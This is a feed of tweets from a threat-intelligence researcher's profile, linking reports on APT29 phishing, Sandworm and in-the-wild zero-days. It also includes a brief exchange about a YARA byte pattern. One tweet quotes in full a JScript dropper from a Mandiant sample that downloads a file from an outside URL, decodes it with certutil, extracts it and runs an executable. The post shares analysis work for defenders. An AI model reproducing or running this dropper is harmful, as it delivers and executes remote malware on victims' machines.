Luke Jenkins

New from Google Threat Intelligence: An actor who may be related to APT29 is abusing ASP to target Russian critics. Collaboration with our good friends @citizenlab. More info on the activity and TTP in the blog. cloud.google.com/blog/topics/th…

🆕🚨 New analysis from @Google TAG on suspected APT29 waterholes against 🇲🇳 gov. n-day exploits targeting iOS and Android we first observed in use from commercial surveillance vendors🫢 more details in the blog! awesome work from @_clem1 and team🤝 blog.google/threat-analysi…

LOOK!!! The #LABScon24 speaker lineup is so fire 🔥🚒🧯 labscon.io/speakers/

Let’s go ahead and kick this off cloud.google.com/blog/topics/th…

@AndrewCyberKop @gabby_roncone I probably deserve it...

I think we should have peer review for malware names. and I think it should be required by law

Grateful to @RUSI_org for allowing me to share thoughts about the re-focusing of Russia’s cyber campaign to provide battlefield advantages to its conventional forces. Signals from mobile devices have become a prioritized form of targeting intelligence. rusi.org/explore-our-re…

Our latest research on SolarMarker's Multi-tiered Infrastructure recordedfuture.com/exploring-the-… @JulianVoeg

@DanWBlack @jfslowik

@jfslowik One at a time Joe. You wait.

Can you unearth an intrusion set that's been publicly documented for over a decade? I have 44 reasons why that seems weird! (Also, where the fuck are Turla and Berserk/Energetic Bear?)

@c_APT_ure @HackingLZ @Mandiant Yes it looked like it's probably just the lea instructions that are in the incorrect order in the comment. But I'll double check when I jump online next.

@LukeJenx @HackingLZ @Mandiant Maybe just switched in comments? // 48 8D 0D ?? ?? 00 00  lea rcx I‘m not really asm fluent, but if 0D for rcx 05 for rax then it‘s just wrong in comments 🤔

APT life is wild var a = new ActiveXObject("WScript.Shell"); function sendRequest(url) { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var response = xhr.response; var fso = new ActiveXObject("Scripting.FileSystemObject"); var file = fso.OpenTextFile("C:\\Windows\\Tasks\\invite.txt", 2, true, 0); file.Write(response); file.Close(); a.Run("certutil -decode C:\\Windows\\Tasks\\invite.txt C:\\Windows\\Tasks\\invite.zip", 0); var startTime = Date.now(); var endTime = null; do { endTime = Date.now(); } while (endTime - startTime < 3000); a.Run("tar -xf C:\\Windows\\Tasks\\invite.zip -C C:\\Windows\\Tasks\\ ", 0); var startTime = Date.now(); var endTime = null; do { endTime = Date.now(); } while (endTime - startTime < 3500); a.Run("C:\\Windows\\Tasks\\SqlDumper.exe", 0); } }; xhr.open("GET", url, true); xhr.send(null); } sendRequest("https://yoloinc/util.php"); from the sample here - mandiant.com/resources/blog…

@c_APT_ure @HackingLZ @Mandiant Let me take a look at this, could be I just never updated the comment itself whilst refining the rule. The binary pattern itself would be accurate.

@HackingLZ @Mandiant The order of 05 & 0D in the // disasm code and $={} binary pattern are not the same. Which is wrong? (Only one matters) I‘m afraid it could be the wrong one 🤔 (though just guessing)

In their latest blog post Mandiant's Luke Jenkins & Dan Black show how APT29 used a variant of the WINELOADER backdoor to target German political parties with a CDU-themed lure. mandiant.com/resources/blog…

APT29 (Midnight Blizzard/Cozy Bear) is targeting German political parties. The SVR has been on a tear lately and their mission of keeping Putin up to date on the West's thinking is especially important at this critical moment in the war. 1/2 mandiant.com/resources/blog…

New report from @Mandiant detailing APT29's expansion of interest beyond diplomatic missions. We judge this to be an early warning signal to other political parties and civil society groups across Europe/the West that they are also in the SVR's sights. mandiant.com/resources/blog…

Zimbra 0day targeting 🇬🇷🇲🇩🇹🇳🇻🇳🇵🇰 from earlier this year - used by multiple actors! New post from @Google TAGs @_clem1 @maddiestone @k_dennesen ! Mind the gap! blog.google/threat-analysi…

Russia’s Sandworm shifts to Living Off the Land techniques targeting Ukrainian power grid in a long history of attempting to terrorize the Ukrainian population. @Mandiant mandiant.com/resources/blog…

.@_clem1 discovered another ITW 0-day in use by a commercial surveillance vendor: CVE-2023-5217. Thank you to Chrome for releasing a patch in TWO 🤯day!! chromereleases.googleblog.com/2023/09/stable…

.@Mandiant researchers observed Russia's APT29, aka Cozy Bear, pursuing governments strategically aligned with Moscow as the threat group ramps up the scope and frequency of its espionage attacks. #cybersecurity #infosec #ITsecurity bit.ly/3LFCUwf

APT2⃣9⃣ has had a busy few months, new joint 🤝 work from @Google TAGs JA[n] and @Mandiant's @DanWBlack @LukeJenx. Watch out, we're just getting warmed up! mandiant.com/resources/blog…

Today, @Mandiant, collaboratively with @Google’s TAG, is releasing research on APT29’s increased pace of phishing activity against governments, foreign embassies, and other diplomatic entities in 2023. A few high-level takeaways below: 🧵 mandiant.com/resources/blog…

Check out @gabby_roncone and @DanWBlack’s latest blog post on the Russian GRU’s playbook in Ukraine based on findings first presented at #HagueTIX2023